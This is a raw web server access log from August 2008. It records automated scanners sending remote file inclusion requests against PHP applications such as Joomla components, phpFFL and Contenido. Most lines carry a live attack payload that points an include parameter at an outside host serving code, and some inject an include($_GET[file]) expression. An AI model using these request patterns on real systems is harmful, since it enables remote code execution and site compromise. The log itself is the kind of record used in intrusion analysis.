87.248.163.41 - - [23/Aug/2008:22:24:09 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:24:13 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
77.221.130.3 - - [23/Aug/2008:22:24:36 -0500] "GET /logs/access_log.1205366400/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:22:24:36 -0500] "GET /errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:22:24:36 -0500] "GET /logs/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.6.8.121 - - [23/Aug/2008:22:25:38 -0500] "GET /?D=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.208.16.94 - - [23/Aug/2008:22:25:52 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
74.208.16.94 - - [23/Aug/2008:22:25:52 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
74.208.16.21 - - [23/Aug/2008:22:27:38 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
74.208.16.21 - - [23/Aug/2008:22:27:38 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
74.200.71.114 - - [23/Aug/2008:22:28:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
74.200.71.114 - - [23/Aug/2008:22:28:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
74.6.8.121 - - [23/Aug/2008:22:30:08 -0500] "GET /logs/access_log.1161129600 HTTP/1.0" 200 299040 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
76.195.200.137 - - [23/Aug/2008:22:31:48 -0500] "GET /logs/index.php?sit=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
76.195.200.137 - - [23/Aug/2008:22:31:52 -0500] "GET /index.php?sit=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
81.248.63.177 - - [23/Aug/2008:22:34:14 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
81.248.63.177 - - [23/Aug/2008:22:34:15 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:38:33 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:38:34 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
66.135.41.76 - - [23/Aug/2008:22:39:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:39:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
87.248.163.41 - - [23/Aug/2008:22:39:33 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:39:33 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.199.190.37 - - [23/Aug/2008:22:39:49 -0500] "GET /logs//saveserver.php?thisdir=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.5.113.34 - - [23/Aug/2008:22:40:08 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.5.113.34 - - [23/Aug/2008:22:40:09 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
91.186.15.66 - - [23/Aug/2008:22:40:21 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.186.15.66 - - [23/Aug/2008:22:40:21 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.6.8.121 - - [23/Aug/2008:22:40:45 -0500] "GET /logs/access_log.1206230400 HTTP/1.0" 200 195475 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.150.189.10 - - [23/Aug/2008:22:42:00 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
200.150.189.10 - - [23/Aug/2008:22:42:00 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
93.190.137.238 - - [23/Aug/2008:22:43:56 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
93.190.137.238 - - [23/Aug/2008:22:43:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
80.93.62.114 - - [23/Aug/2008:22:44:30 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:22:44:30 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:22:44:30 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:22:44:30 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.58.167.158 - - [23/Aug/2008:22:46:04 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:22:46:04 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:22:46:04 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:22:46:04 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
66.135.41.76 - - [23/Aug/2008:22:46:06 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:46:06 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:46:06 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:46:06 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
86.58.154.237 - - [23/Aug/2008:22:48:46 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
86.58.154.237 - - [23/Aug/2008:22:48:46 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
66.135.41.76 - - [23/Aug/2008:22:49:15 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:49:15 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:49:15 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:49:15 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
213.248.62.98 - - [23/Aug/2008:22:49:26 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
213.248.62.98 - - [23/Aug/2008:22:49:27 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
74.6.8.121 - - [23/Aug/2008:22:50:24 -0500] "GET /logs/access_log.1194307200 HTTP/1.0" 200 213710 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.114 - - [23/Aug/2008:22:50:30 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:22:50:30 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.10.154.65 - - [23/Aug/2008:22:50:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:22:50:54 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
190.137.181.149 - - [23/Aug/2008:22:51:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
190.137.181.149 - - [23/Aug/2008:22:51:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.3 - - [23/Aug/2008:22:51:43 -0500] "GET /logs/access_log.1211500800/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
86.58.154.237 - - [23/Aug/2008:22:52:16 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
213.248.62.98 - - [23/Aug/2008:22:52:29 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
77.221.130.3 - - [23/Aug/2008:22:52:41 -0500] "GET /logs/access_log.1211500800/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
200.150.189.10 - - [23/Aug/2008:22:53:45 -0500] "GET /logs/access_log.1208044800/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
200.150.189.10 - - [23/Aug/2008:22:53:45 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
200.150.189.10 - - [23/Aug/2008:22:53:45 -0500] "GET /logs/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.76"
66.135.41.76 - - [23/Aug/2008:22:53:57 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:53:59 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:54:05 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:22:54:05 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
200.150.189.10 - - [23/Aug/2008:22:54:05 -0500] "GET /logs/access_log.1206230400/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
198.145.244.100 - - [23/Aug/2008:22:54:15 -0500] "GET /logs/access_log.1199577600//components/com_simpleboard/image_upload.php?sbp=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:22:54:15 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:22:54:15 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
69.10.154.65 - - [23/Aug/2008:22:54:24 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
87.248.163.41 - - [23/Aug/2008:22:55:29 -0500] "GET /logs/access_log.1208044800/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:55:29 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:55:29 -0500] "GET /logs/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.248.163.41 - - [23/Aug/2008:22:56:10 -0500] "GET /logs/access_log.1206230400/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
76.195.200.137 - - [23/Aug/2008:22:56:30 -0500] "GET /logs/index.php?sit=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
76.195.200.137 - - [23/Aug/2008:22:56:31 -0500] "GET /index.php?sit=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
198.145.244.100 - - [23/Aug/2008:22:56:36 -0500] "GET /logs/access_log.1214179200//components/com_simpleboard/image_upload.php?sbp=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
12.206.23.168 - - [23/Aug/2008:22:58:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
12.206.23.168 - - [23/Aug/2008:22:58:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:00:26 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:00:26 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
80.57.81.49 - - [23/Aug/2008:23:00:49 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
80.57.81.49 - - [23/Aug/2008:23:00:50 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
87.248.163.41 - - [23/Aug/2008:23:02:00 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/v6.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
80.57.81.49 - - [23/Aug/2008:23:03:05 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
80.57.81.49 - - [23/Aug/2008:23:03:05 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
86.58.154.237 - - [23/Aug/2008:23:03:47 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
86.58.154.237 - - [23/Aug/2008:23:03:47 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
86.58.154.237 - - [23/Aug/2008:23:03:48 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
77.232.68.10 - - [23/Aug/2008:23:03:50 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
77.232.68.10 - - [23/Aug/2008:23:03:50 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
69.10.154.65 - - [23/Aug/2008:23:04:21 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:23:04:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
69.10.154.65 - - [23/Aug/2008:23:04:22 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
80.93.62.114 - - [23/Aug/2008:23:05:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:05:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
200.150.189.10 - - [23/Aug/2008:23:05:50 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
76.195.200.137 - - [23/Aug/2008:23:07:38 -0500] "GET /logs/index.php?spage=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
76.195.200.137 - - [23/Aug/2008:23:07:39 -0500] "GET /index.php?spage=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
80.93.62.114 - - [23/Aug/2008:23:07:58 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:07:59 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:09:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
80.93.62.114 - - [23/Aug/2008:23:09:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.248.62.98 - - [23/Aug/2008:23:10:30 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
213.248.62.98 - - [23/Aug/2008:23:10:30 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
213.248.62.98 - - [23/Aug/2008:23:10:30 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
86.58.154.237 - - [23/Aug/2008:23:13:16 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
66.135.41.76 - - [23/Aug/2008:23:17:43 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:17:43 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:17:43 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:17:44 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:17:44 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:17:44 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.135.41.76 - - [23/Aug/2008:23:18:21 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://frauenaerzte-bamberg.de/news/parse/marthabotid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
